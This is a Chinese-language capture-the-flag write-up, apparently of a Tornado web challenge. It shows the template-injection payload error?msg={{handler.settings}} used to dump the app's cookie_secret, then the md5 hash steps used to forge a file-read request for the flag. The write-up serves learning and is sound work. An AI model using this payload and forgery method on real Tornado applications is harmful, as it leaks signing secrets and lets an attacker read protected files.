分别点开三个文件
/flag.txt
由此可知,flag在 /fllllllllllllag 里面
/welcome.txt
发现render函数,百度一下,render是一个渲染函数,渲染变量到模板中,模板嘿嘿嘿,猜想可能存在模板注入吧,我所知道就这些请见谅。。。。
render是python中的一个渲染函数,也就是一种模板,通过调用的参数不同,生成不同的网页 render配合Tornado使用。
/hints.txt
md5(cookie_secret+md5(filename))
cookie_secret的值加上filename用md5加密后的值 然后再把这个值用md5加密
现在要找filename和cookie_secret,filename猜测是/fllllllllllllag
访问一下/fllllllllllllag文件
发现错误,error?msg=Error
测试一下,发现确实存在模板注入
payload: error?msg={{handler.settings}}
Tornado是一种 Web 服务器软件的开源版本。Tornado 和现在的主流 Web 服务器框架(包括大多数 Python 的框架)有着明显的区别:它是非阻塞式服务器,而且速度相当快。
在tornado模板中,存在一些可以访问的快速对象,这里用到的是handler.settings,handler 指向RequestHandler,而RequestHandler.settings又指向self.application.settings,所以handler.settings就指向
RequestHandler.application.settings了,这里面就是我们的一些环境变量
通过模板注入方式我们可以构造获取cookie-secret的payload
error?msg={{handler.settings}}模板注入STTI,获取cookie_secret - 码农教程
发现cookie_secret:493a2ff6-9b88-4a9d-8975-8341b494653f
/fllllllllllllag md5加密得到: 3bf9f6cf685a6dd8defadabfb41a03a1
记得要带 / 要不然不对
cookie-secret+md5(/fllllllllllllag)的值是
493a2ff6-9b88-4a9d-8975-8341b494653f3bf9f6cf685a6dd8defadabfb41a03a1
再次md5加密:00d018cd92b47b7bad1c86c5a2ae2b87
payload:
file?filename=/fllllllllllllag&filehash=00d018cd92b47b7bad1c86c5a2ae2b87
